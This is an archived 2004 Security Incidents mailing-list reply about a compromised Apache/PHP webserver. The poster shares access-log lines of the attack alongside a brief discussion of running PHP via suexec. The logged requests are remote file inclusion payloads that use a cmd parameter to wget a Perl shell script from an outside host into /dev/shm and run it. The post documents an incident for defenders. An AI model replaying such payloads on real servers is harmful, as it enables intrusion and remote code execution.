Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7)

From: "nathan c. dickerson" <nathan () pro net>
Date: Tue, 13 Jul 2004 16:52:23 -0700
Just one correction, I said the logs were useless.. thats not quite true.
66.119.34.39 - - [06/Jul/2004:17:47:05 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/var/tmp/.. 
.;perl%20shell.pl HTTP/1.1" 200 10136
66.119.34.39 - - [06/Jul/2004:17:47:17 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20//dev/shm;p 
erl%20shell.pl HTTP/1.1" 200 10136
66.119.34.39 - - [06/Jul/2004:17:47:19 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;pe 
rl%20shell.pl HTTP/1.1" 200 10136
66.119.34.39 - - [06/Jul/2004:17:47:33 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;ls 
HTTP/1.1" 200 10068
66.119.34.39 - - [06/Jul/2004:17:47:40 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;ls 
HTTP/1.1" 200 10068
66.119.34.39 - - [06/Jul/2004:17:48:23 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;wg 
et%20http://members.lycos.co.uk/lotsen5k/shell.pl HTTP/1.1" 200 10479
66.119.34.39 - - [06/Jul/2004:17:48:23 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;wg 
et%20http://members.lycos.co.uk/lotsen5k/shell.pl HTTP/1.1" 200 10068
66.119.34.39 - - [06/Jul/2004:17:48:30 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;ls 
HTTP/1.1" 200 10084
66.119.34.39 - - [06/Jul/2004:17:48:37 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;pe 
rl%20shhell.pl HTTP/1.1" 200 10137
66.119.34.39 - - [06/Jul/2004:17:48:51 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;pe 
rl%20shell.pl HTTP/1.1" 200 10068
66.119.34.39 - - [08/Jul/2004:20:13:59 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;pe 
rl%20.shell HTTP/1.1" 200 10134
66.119.34.39 - - [08/Jul/2004:20:13:59 -0700] "GET /favicon.ico HTTP/1.1" 404 298 66.119.34.39 - - [08/Jul/2004:20:14:03 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;ls 
HTTP/1.1" 200 10084
66.119.34.39 - - [08/Jul/2004:20:14:10 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;wg 
et%20http://members.lycos.co.uk/lotsen5k/.shell HTTP/1.1" 200 10473
66.119.34.39 - - [08/Jul/2004:20:14:15 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;pe 
rl%20.shell HTTP/1.1" 200 10068

I can sleep well tonight,

Nathan



Dmitry Alyabyev wrote:


On Saturday 10 July 2004 04:40, Tim Greer wrote:

[skip]


Sounds like one of the many PHP scripts is exploitable.  You could run
PHP as CGI w/ the suexec wrapper (and even tweak the source or use an
existing patch so PHP scripts don't need to be modified at all (other
than the ownership of some files/dirs PHP scripts need to use/write to).
not really - you will lose authentication within PHP scripts in meaning of receiving password via environment and some add-ons like Zend optimizer will stop working
Previous By Date Next
Previous By Thread Next

Current thread: